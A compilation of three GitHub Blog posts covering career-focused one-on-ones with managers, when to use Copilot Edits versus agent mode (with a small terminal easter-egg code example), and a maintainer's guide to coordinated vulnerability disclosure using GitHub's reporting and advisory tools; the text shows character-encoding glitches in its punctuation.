You can also use this space to validate decisions and gather context. If youā€™re weighing different paths forward, donā€™t just ask for approvalā€”frame the conversation in terms of trade-offs:

ā€œHere are the pros and cons of refactoring this service now versus later. How does this align with our broader business goals?ā€

Treat your manager like a decision-making API: Feed in the relevant signals, surface whatā€™s unclear, and work together on an informed response.

Use one-on-ones for career versioning (even before youā€™re ā€œreadyā€)

One-on-one meetings are a great time to discuss your long-term career growthā€”even if youā€™re not actively seeking a promotion. Instead of waiting until promotion season, start having these conversations early to build clarity, direction, and momentum over time.

  • If youā€™re more than a year away from seeking a promotion, start talking to your manager about:
    • Where am I already meeting expectations?
    • Where should I focus on strengthening my skills?
  • If youā€™re approaching the next level or considering going up for promotion soon, try focusing the conversation on:
    • What kind of work would demonstrate readiness for the next level?
    • Are there specific opportunities I can take on to grow my scope or visibility?

By treating growth as an iterative process rather than an all-or-nothing milestone, you can continuously improve and course-correct based on early feedback.

A useful framework for structuring these discussions is the Three Circles of Impact:

  1. Individual Contributions ā€“ The direct value of your work.
  2. Collaboration ā€“ How you work with and support others across the team.
  3. Enabling Others ā€“ Mentorship, knowledge sharing, or improving systems and tooling for your peers.

If youā€™re not sure how to show impact across all three, your one-on-one is a great place to explore it. The key is surfacing your goals early so your manager can help guide you toward the kinds of work that will stretch your skills and broaden your influence.

The more you shape your contributions around these areas, the clearer your readiness for growth becomesā€”and the easier it is for your manager to advocate on your behalf.

Your manager canā€™t debug what they donā€™t see

Managers donā€™t have full visibility into your day-to-day experience, so one-on-ones are the right time to highlight persistent blockers and unclear expectations.

For instance, I once brought up a latency issue I was chasing down. The endpointā€™s performance was slightly above our service level objective (SLO) target, and I had already spent a good chunk of time optimizing it. But in that conversation, my manager offered a different lens:

ā€œAre we optimizing for the right thing? We control the SLO. If the extra latency is due to how the system is designed (and if users arenā€™t impacted) maybe the right move is to revisit the threshold instead of squeezing more performance out of it.ā€

That single conversation saved me hours and helped me reframe the problem entirely. Sometimes, the fix isnā€™t in your codeā€”itā€™s in how youā€™re measuring success.

Make your one-on-ones work for you

Your one-on-ones will become far more effectiveā€”and lead to real growthā€”when you treat them as time to think strategically, not just check in. Reframing these meetings around your goals, your environment, and your long-term development puts you in a much stronger position to advocate for yourself and your work.

Start thinking about your career progression earlier than feels natural. Come prepared. Bring in whatā€™s going well, whatā€™s stuck, and where you want to grow. And remember: your manager canā€™t fix what they donā€™t know about, and they canā€™t support your goals if you never share them.

If this shift feels unfamiliar, youā€™re not alone. The Engineerā€™s Survival Guide helped me reframe my thinking around one-on-ones.

Here are a few ideas that stuck with me:

  • Your manager isnā€™t a mind reader.
  • You canā€™t expect guidance if you donā€™t come with a direction.
  • Your growth is a shared effort, but it starts with you.

The earlier you see one-on-ones as a tool for impact and growth, the more value youā€™ll get from them.

The post How engineers can use one-on-ones with their manager to accelerate career growth appeared first on The GitHub Blog.

March 26, 2025  00:18:07

Ever find yourself staring at an AI coding assistant, wondering why itā€™s not quite nailing what you need? Maybe itā€™s spitting out code thatā€™s close but not quite right, or youā€™re stuck wrestling with a problem that spans multiple files, wishing it could just get the bigger picture. Often, when developers hit these snags, itā€™s less about the tool, and more about knowing how to use it.

So hereā€™s the key question you should ask yourself: ā€œDo I need a quick answer or a thoughtful conversation?ā€ Thatā€™s the secret to unlocking AI coding tools like GitHub Copilot.

Because different aspects of Copilot serve different needs, and weā€™re here to help you discern when is the best time for agent mode and when you should be using Copilot Edits instead. Both are powerhouse Copilot features, built to supercharge your coding, but they shine in different scenarios.

Copilot Edits is your go-to for fast, precise tweaksā€”think refactoring a function, squashing a bug, or applying consistent changes across files without losing your flow.

Agent mode, on the other hand, steps up as your AI collaborator for thornier, multi-file challengesā€”analyzing your codebase, proposing architectural fixes, and even running terminal commands while you steer the ship and approve each move.

Figuring out which one fits your needs doesnā€™t just save time, it turns your AI assistant into a seamless extension of your own coding instincts.

Copilot command center: Your chat window

Before learning more about agent mode and Copilot Edits, itā€™s essential to understand the Copilot chat window in VS Codeā€”your central hub for AI interactions.

GitHub Copilot chat interface showing the 'Ask Copilot' panel. The interface displays the Copilot robot logo at the top, followed by 'Ask Copilot' heading. Below that is a disclaimer stating 'Copilot is powered by AI, so mistakes are possible. Review output carefully before use.' The interface includes instructions: 'or type \# to attach context', 'to chat with extensions', and 'Type / to use commands'. At the bottom is a chat input field with the placeholder text 'Ask Copilot' and buttons to add context, with 'GPT-4o' shown as the current model.

This is where you can:

  • Ask coding questions like ā€œHow do I implement JWT authentication in Node.js?ā€
  • Use /explain to understand complex code blocks
  • Debug issues with /fix
  • Generate tests with /tests
  • Access both Edits and agent mode features

With the chat window giving you a solid grasp of your codeā€™s context, youā€™re in the driverā€™s seat to pick the perfect Copilot tool: Edits or agent mode, for whateverā€™s next.

Let me take you through a real-world example of how Iā€™ve been using GitHub Copilot to evolve my personal website. It started with a simple idea: create an interactive terminal-style easter egg that showcases my skills in a developer-friendly way.

I began with a basic command processing function that handled a few simple commands:

function processCommand(command) {
try {
if (!command?.trim()) {
return 'Please enter a command. Type "more" for available commands.';
}

const sanitizedCommand = command.toLowerCase().trim();

switch (sanitizedCommand) {
case 'more':
return commands.more;
case 'about':
return commands.about;
case 'skills':
return commands.skills;
case 'projects':
return commands.projects;
case 'contact':
return commands.contact;
default:
return `Command not found: "${command}". Type 'more' for available commands.`;
}
} catch (error) {
console.error('[Terminal] Error processing command:', error);
return 'An error occurred while processing the command.';
}
}

Initially, I used Copilot Edits to quickly add new features. For instance, I wanted to add a ā€˜githubā€™ command to showcase my repositories:

VS Code editor showing a web development project for ag11.dev. The left sidebar displays a file explorer with various components including ContentLinks.astro, DarkModeToggle, and TerminalEasterEgg files. The main editor shows TerminalService.ts file with a COMMANDS object being exported, listing GitHub repositories including github-commenter-raffle, octogatosconf, and dependabot-automation projects. The right sidebar shows GitHub Copilot suggesting steps to add a new 'github' command to the terminal that will display links to repositories. The bottom panel shows a terminal running a development server with local and network URLs. The interface has a dark theme with syntax highlighting in various colors. Add a new command called 'github' to the TerminalEasterEgg that displays links to my GitHub repositories with a short description of each. Update both the processCommand function and the commands object.

Copilot Edits made targeted changes to the switch statement in the processCommand function and added the new command to the commands objectā€”a perfect example of quick, focused modifications to existing code.

As my terminal interface matured, I wanted to implement several interactive features that would require more comprehensive improvements. To get animation effects, keyboard navigation controls, and an extensible theming system that spanned multiple files to work together seamlessly, I turned to agent mode.

The agent mode advantage

When we designed agent mode, we didnā€™t want to create a tool thatā€™s a simple AI feature: We wanted to create an AI that could pair with you! Rather than working on specific, limited changes where you might be reinventing the wheel, youā€™re now providing higher-level direction while the AI tackles the implementation details across multiple files or systems.

That being said, with agent mode, youā€™re still in control of the process. The AI has more latitude to explore your codebase and suggest comprehensive solutions, but you always review and approve the changes before theyā€™re applied. Itā€™s not about surrendering control, itā€™s about effectively delegating implementation details while you focus on the bigger picture.

What makes agent mode special:

  • Codebase search: It searches your codebase to find relevant files without you explicitly specifying them.
  • Self-iteration: It can iterate on its own output to complete your entire request in one go.
  • Error identification and repair: It automatically recognizes and fixes errors in suggested code.
  • Terminal command execution: It suggests and runs terminal commands with your permission.
  • Build and run capabilities: It can build and run your application to check if changes work correctly.

I reach for agent mode when:

  • Building complete features: ā€œAdd analytics tracking throughout the appā€
  • Navigating unfamiliar codebases: ā€œHelp me understand how authentication works in this projectā€
  • Writing and verifying tests: ā€œWrite tests for the UserService and make sure they passā€
  • Implementing terminal-heavy tasks: ā€œSet up a new React project with TypeScript, Redux, and styled-componentsā€
  • Doing complex refactoring: ā€œRefactor our API calls to use the new error handling patternā€

Continuing with my terminal easter egg, letā€™s say I want to implement a much more extensive upgrade with multiple features, like adding a typing animation effect for responses, command history navigation with up/down arrows, and tab completion for commands. At the same time, I want to create a new TerminalThemes.css file with different color scheme options that users can switch between with a ā€˜themeā€™ command.

GitHub Copilot interface showing a chat panel with 'COPILOT EDITS' tab selected. A user named AndreaGriffiths11 (with profile picture) has requested several enhancements to a TerminalEasterEgg component, including adding a typing animation effect for responses, command history navigation with up/down arrows, tab completion for commands, and creating a new TerminalThemes.css file with theme switching options. The interface shows 'TerminalEasterEgg.astro:1-21' as the current file. Below, GitHub Copilot has started responding with 'I'll help enhance the terminal with those features. Let's break this down into steps:' and indicates it 'Used 1 reference'." Enhance our TerminalEasterEgg to include a typing animation effect for responses, add command history navigation with up/down arrows, and implement tab completion for commands. Also create a new TerminalThemes.css file with different color scheme options that users can switch between with a 'theme' command.

This is where agent mode truly shines. The task spans multiple files, requires an understanding of the existing codebase, and involves creating entirely new functionality. Here, agent mode would:

  1. Search through the codebase to understand the terminal implementation.
  2. Create the new CSS file for themes.
  3. Add typing animation functionality to terminal responses.
  4. Implement keyboard handlers for history navigation.
  5. Build the tab completion system.
  6. Add the theme command to the switch statement.
  7. Test the implementation to ensure everything works correctly.

This is the beauty of agent mode: it has a complex understanding of patterns and relationships in different parts of the codebase! Agent mode can ensure that the typing animation did not interfere with existing functionality, check that the history navigation was compatible with the current command processing, and confirm that the theme switching properly modified the UI. It is precisely in this multi-file feature implementation with interlinking components that agent mode can shine compared to the more laser-focused Copilot Edits.

In the below episode of GitHub Checkout, you can see agent mode implementing a complete water consumption tracker feature in an iOS app. It not only writes the code but also builds, runs, and tests the app, all from a single prompt, without the developer needing to touch the editor directly.

The secret: use both together!

After many hours with both tools, hereā€™s my takeaway: Itā€™s not about picking one, or one being better than the other. Itā€™s about wielding them together for different purposes. Copilot Edits and agent mode work well together to augment our coding abilities, whether thatā€™s a more prompt-centric style of development with agent mode, or maintaining granular file edit control via Copilot Edits.

Regardless of which tool you are using, you are still the pilot, steering the AI to supercharge your own productivity. The more context you provide in your prompts, the better results youā€™ll getā€”and remember, you always have the final say on any suggested changes.

If youā€™re just jumping into the world of AI, check out our new Getting started with GitHub Copilot tutorial series, where we walk you through everything from initial setup to advanced techniques. Itā€™s perfect for developers at any skill level who want to quickly become productive with AI-assisted coding.

Happy coding, everyone! šŸ’»āœØ

How to get started

Want to try these features? Hereā€™s my quick setup guide:

For Copilot Edits:

  1. Open VS Code and look for the Copilot Chat window.
  2. Click the ā€œEdit with Copilotā€ button to open the Copilot Edits view.
  3. Add your relevant files to the working set. Copilot will only make changes to files in this set (unless itā€™s creating a new file).
  4. Type your prompt describing what changes you need.
  5. Review the ā€œdiffā€ of all proposed changes before accepting them.

For agent mode:

  1. Make sure youā€™re using VS Code version 1.99 or higher (as of original publish date, available in VS Code Insiders).
  2. Switch from ā€œEditā€ to ā€œAgentā€ mode.
  3. Type your prompt, describing the complex task or feature you want to implement.
  4. Agent mode will work autonomously, but still require your approval for changes.
  5. For best results, consider using custom instructions to personalize how agent mode works with your codebase.

Try GitHub Copilot free
Ready to automate your dependency management with AI? Learn more about GitHub Copilot for Business or start your free trial of GitHub Enterprise today.

The post Mastering GitHub Copilot: When to use AI agent mode appeared first on The GitHub Blog.

March 24, 2025  16:56:50

Imagine this: Youā€™re sipping your morning coffee and scrolling through your emails, when you spot itā€”a vulnerability report for your open source project. Itā€™s your first one. Panic sets in. What does this mean? Where do you even start?

Many maintainers face this moment without a clear roadmap, but the good news is that handling vulnerability reports doesnā€™t have to be stressful. Below, weā€™ll show you that with the right tools and a step-by-step approach, you can tackle security issues efficiently and confidently.

Letā€™s dig in.

What is vulnerability disclosure?

If you discovered that the lock on your front door was faulty, would you attach a note announcing it to everyone passing by? Of course not! Instead, youā€™d quietly tell the people who need to knowā€”your family or housematesā€”so you can fix it before it becomes a real safety risk.

Thatā€™s exactly how vulnerability disclosure should be handled. Security issues arenā€™t just another bug. They can be a blueprint for attackers if exposed too soon. Instead of discussing them in the open, maintainers should work with security researchers behind the scenes to fix problems before they become public.

This approach, known as Coordinated Vulnerability Disclosure (CVD), keeps your users safe while giving you time to resolve the issue properly.

To support maintainers in this process, GitHub provides tools like Private Vulnerability Reporting (PVR), draft security advisories, and Dependabot alerts. These tools are free to use for open source projects, and are designed to make managing vulnerabilities straightforward and effective.

Letā€™s walk through how to handle vulnerability reports, so that the next time one lands in your inbox, youā€™ll know exactly what to do!

The vulnerability disclosure process, at a glance

Hereā€™s a quick overview of what you should do if you receive a vulnerability report:

  1. Enable Private Vulnerability Reporting (PVR) to handle submissions securely.
  2. Collaborate on a fix: Use draft advisories to plan and test resolutions privately.
  3. Request a Common Vulnerabilities and Exposures (CVE) identifier: Learn how to assign a CVE to your advisory for broader visibility.
  4. Publish the advisory: Notify your community about the issue and the fix.
  5. Notify and protect users: Utilize tools like Dependabot for automated updates.

Now, letā€™s break down each step.

A cartoon bug happily emerging from an open envelope, symbolizing bug reports or vulnerability disclosures.

1. Start securely with PVR

Hereā€™s the thing: There are security researchers out there actively looking for vulnerabilities in open source projects and trying to help. But if they donā€™t know who to report the problem to, itā€™s hard to resolve it. They could post the issue publicly, but this could expose users to attacks before thereā€™s a fix. They could send it to the wrong person and delay the response. Or they could give up and move on.

The best way to ensure these researchers can reach you easily and safely is to turn on GitHubā€™s Private Vulnerability Reporting (PVR).

Think of PVR as a private inbox for security issues. It provides a built-in, confidential way for security researchers to report vulnerabilities directly in your repository.

šŸ”— How to enable PVR for a repository or an organization.

Heads up! By default, maintainers donā€™t receive notifications for new PVR reports, so be sure to update your notification settings so nothing slips through the cracks.

Enhance PVR with a SECURITY.md file

PVR solves the ā€œwhereā€ and the ā€œhowā€ of reporting security issues. But what if you want to set clear expectations from the start? Thatā€™s where a SECURITY.md file comes in handy.

PVR is your front door, and SECURITY.md is your welcome guide telling visitors what to do when they arrive. Without it, researchers might not know whatā€™s in scope, what details you need, or whether their report will be reviewed.

Maintainers are constantly bombarded with requests, making triage difficultā€”especially if reports are vague or missing key details. A well-crafted SECURITY.md helps cut through the noise by defining expectations early. It reassures researchers that their contributions are valued while giving them a clear framework to follow.

A good SECURITY.md file includes:

  • How to report vulnerabilities (ex: ā€œPlease submit reports through PVR.ā€)
  • What information should be included in a report (e.g., steps to reproduce, affected versions, etc.)

Pairing PVR with a clear SECURITY.md file helps you streamline incoming reports more effectively, making it easier for researchers to submit useful details and for you to act on them efficiently.

Three people gathered around a computer screen with puzzled and concerned expressions, discussing something on the screen.

2. Collaborate on a fix: Draft security advisories

Once you confirm the issue is a valid vulnerability, the next step is fixing it without tipping off the wrong people.

But where do you discuss the details? You canā€™t just drop a fix in a public pull request and hope no one notices. If attackers spot the change before the fix is officially released, they can exploit it before users can update.

What youā€™ll need is a private space where you and your collaborators can investigate the issue, work on and test a fix, and then coordinate its release.

GitHub provides that space with draft security advisories. Think of them like a private fork, but specifically for security fixes.

Why use draft security advisories?

  • They keep your discussion private, so that you can work privately with your team or trusted contributors without alerting bad actors.
  • They centralize everything, so your discussions, patches, and plans are kept in a secure workspace.
  • Theyā€™re ready for publishing when you are: You can convert your draft advisory into a public advisory whenever youā€™re ready.

šŸ”— How to create a draft advisory.

By using draft security advisories, you take control of the disclosure timeline, ensuring security issues are fixed before they become public knowledge.

A stylized illustration of a document labeled 'CVE,' symbolizing a Common Vulnerabilities and Exposures report.

3. Request a CVE with GitHub

Some vulnerabilities are minor contained issues that can be patched quietly. Others have a broader impact and need to be tracked across the industry.

When a vulnerability needs broader visibility, a Common Vulnerabilities and Exposures (CVE) identifier provides a standardized way to document and reference it. GitHub allows maintainers to request a CVE directly from their draft security advisory, making the process seamless.

What is a CVE, and why does it matter?

A CVE is like a serial number for a security vulnerability. It provides an industry-recognized reference so that developers, security teams, and automated tools can consistently track and respond to vulnerabilities.

Why would you request a CVE?

  • For maintainers, it helps ensure a vulnerability is adequately documented and recognized in security databases.
  • For security researchers, it provides validation that their findings have been acknowledged and recorded.

CVEs are used in security reports, alerts, feeds, and automated security tools. This helps standardize communication between projects, security teams, and end users.

Requesting a CVE doesnā€™t make a vulnerability more or less critical, but it does help ensure that those affected can track and mitigate risks effectively.

šŸ”— How to request a CVE.

Once assigned, the CVE is linked to your advisory but will remain private until you publish it.

By requesting a CVE when appropriate, youā€™re helping improve visibility and coordination across the industry.

A bold, rectangular stamp with the word 'PUBLISHED,' indicating the completion and release of content.

4. Publish the advisory

Good job! Youā€™ve fixed the vulnerability. Now, itā€™s time to let your users know about it. A security advisory does more than just announce an issue. It guides your users on what to do next.

What is a security advisory, and why does it matter?

A security advisory is like a press release for an important update. Itā€™s not just about disclosing a problem, itā€™s about ensuring your users know exactly whatā€™s happening, why it matters, and what they need to do.

A clear and well-written advisory helps to:

  • Inform users: Clearly explain the issue and provide instructions for fixing it.
  • Build trust: Demonstrate accountability and transparency by addressing vulnerabilities proactively.
  • Trigger automated notifications: Tools, like GitHub Dependabot, use advisories to alert developers with affected dependencies.

šŸ”— How to publish a security advisory.

Once published, the advisory becomes public in your repository and includes details about the vulnerability and how to fix it.

Best practices for writing an advisory

  • Use plain language: Write in a way thatā€™s easy to understand for both developers and non-technical users
  • Include essential details:
    • A description of the vulnerability and its impact
    • Versions affected by the issue
    • Steps to update, patch, or mitigate the risk
  • Provide helpful resources:
    • Links to patched versions or updated dependencies
    • Workarounds for users who canā€™t immediately apply the fix
    • Additional documentation or best practices

šŸ“Œ Check out this advisory for a well-structured reference.

A well-crafted security advisory is not just a formality. Itā€™s a roadmap that helps your users stay secure. Just as a company would carefully craft a press release for a significant change, your advisory should be clear, reassuring, and actionable. By making security easier to understand, you empower your users to protect themselves and keep their projects safe.

A person typing on a laptop while a small, animated robot (Dependabot) with arms raised in excitement interacts beside them.

5. After publication: Notify and protect users

Publishing your security advisory isnā€™t the finish line. Itā€™s the start of helping your users stay protected. Even the best advisory is only effective if the right people see it and take action.

Beyond publishing the advisory, consider:

  • Announcing it through your usual channels: Blog posts, mailing lists, release notes, and community forums help reach users who may not rely on automated alerts.
  • Documenting it for future users: Someone might adopt your project later without realizing a past version had a security issue. Keep advisories accessible and well-documented.

You should also take advantage of GitHub tools, including:

  • Dependabot alerts
    • Automatically informs developers using affected dependencies
    • Encourages updates by suggesting patched versions
  • Proactive prevention
    • Use scanning tools to find similar problems in different parts of your project. If you find a problem in one area, it might also exist elsewhere
    • Regularly review and update your projectā€™s dependencies to avoid known issues
  • CVE publication and advisory database
  • If you requested a CVE, GitHub will publish the CVE record to CVE.org for industry-wide tracking
  • If eligible, your advisory will also be added to the GitHub Advisory Database, improving visibility for security researchers and developers

Whether through automated alerts or direct communication, making your advisory visible is key to keeping your project and its users secure.

Next report? Youā€™re ready!

With the right tools and a clear approach, handling vulnerabilities isnā€™t just manageableā€”itā€™s part of running a strong, secure project. So next time a report comes in, take a deep breath. Youā€™ve got this!

Three thought bubblesā€”two filled with question marks and one with light bulbsā€”symbolizing frequently asked questions (FAQ) and the process of finding answers or solutions.

FAQ: Common questions from maintainers

Youā€™ve got questions? We got answers! Whether youā€™re handling your first vulnerability report or just want to sharpen your response process, here is what you need to know.

1. Why is Private Vulnerability Reporting (PVR) better than emails or public issues for vulnerability reports?
Great question! At first glance, email or public issue tracking might seem like simple ways to handle vulnerability reports. But PVR is a better choice because it:

  • Keeps things private and secure: PVR ensures that sensitive details stay confidential. No risk of accidental leaks, and no need to juggle security concerns over email.
  • Keeps everything in one place: No more scattered emails or external tools. Everythingā€”discussions, reports, and updatesā€”is neatly stored right in your repository.
  • Makes it easier for researchers: PVR gives researchers a dedicated, structured way to report issues without jumping through hoops.

Bottom line? PVR makes life easier for both maintainers and researchers while keeping security under control.

2. What steps should I take if I receive a vulnerability report that I believe is a false positive?
Not every report is a real security issue, but itā€™s always worth taking a careful look before dismissing it.

  • Double-check details: Sometimes, what seems like a false alarm might be misunderstood. Review the details thoroughly.
  • Ask for more information: Ask clarifying questions or request additional details through GitHubā€™s PVR. Many researchers are happy to provide further context.
  • Check with others: If youā€™re unsure, bring in a team member or a security-savvy friend to help validate the report.
  • Close the loop: If it is a false positive, document your reasoning in the PVR thread. Transparency keeps things professional and builds trust with the researcher.

3. How fast do I need to respond?
* Acknowledge ASAP: Even if you donā€™t have a fix yet, let the researcher know you got their report. A simple ā€œThanks, weā€™re looking into itā€ goes a long way.
* Follow the 90-day best practice: While thereā€™s no hard rule, most security pros aim to address verified vulnerabilities within 90 days.
* Prioritize by severity: Use the Common Vulnerability Scoring System (CVSS) to gauge urgency and decide what to tackle first.

Think of it this way: No one likes being left in the dark. A quick update keeps researchers engaged and makes collaboration smoother.

4. How do I figure out the severity of a reported vulnerability?
Severity can be tricky, but donā€™t stress! There are tools and approaches that make it easier.

  • Use the CVSS calculator: It gives you a structured way to evaluate the impact and exploitability of a vulnerability.
  • Consider real-world impact: A vulnerability that requires special conditions to exploit might be lower risk, while one that can be triggered easily by any user could be more severe.
  • Collaborate with the reporter: They might have insights on how the issue could be exploited in real-world scenarios.

Take it step by stepā€”itā€™s better to get it right than to rush.

5. Should I request a CVE before or after publishing an advisory?
Thereā€™s no one-size-fits-all answer, but hereā€™s a simple way to decide:

  • If itā€™s urgent: Publish the advisory first, then request a CVE. CVE assignments can take 1ā€“3 days, and you donā€™t want to delay the fix.
  • For less urgent cases: Request a CVE beforehand to ensure itā€™s included in Dependabot alerts from the start.

Either way, your advisory gets published, and your users stay informed.

6. Where can I learn more about managing vulnerabilities and security practices?
Thereā€™s no need to figure everything out on your own. These resources can help:

Security is an ongoing journey, and every step you take makes your projects stronger. Keep learning, stay proactive, and youā€™ll be in great shape.

Next steps

By taking these steps, youā€™re protecting your project and contributing to a safer and more secure open source ecosystem.

The post A maintainerā€™s guide to vulnerability disclosure: GitHub tools to make it simple appeared first on The GitHub Blog.